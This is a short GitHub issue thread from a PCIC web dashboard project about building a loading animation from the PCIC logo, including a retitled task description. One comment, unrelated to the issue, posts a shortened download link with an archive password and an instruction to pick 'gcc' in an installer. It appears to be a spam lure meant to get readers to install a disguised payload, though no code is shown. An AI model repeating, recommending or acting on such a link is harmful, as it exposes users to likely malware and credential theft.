### ISSUE TITLE
Implement PCIC Logo Loader

### ISSUE THREAD

**Issue by tonzxz** [Quanby-IT-Solutions/pcic_web_dashboard#31]

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by joemar25** [comment]
Previous Issue Title: Make a PCIC loader using the Logo

New Issue Title: Implement PCIC Logo Loader

Description:
Develop a loader using the [PCIC Logo](https://commons.wikimedia.org/wiki/File:Philippine_Crop_Insurance_Corporation_(PCIC).svg).
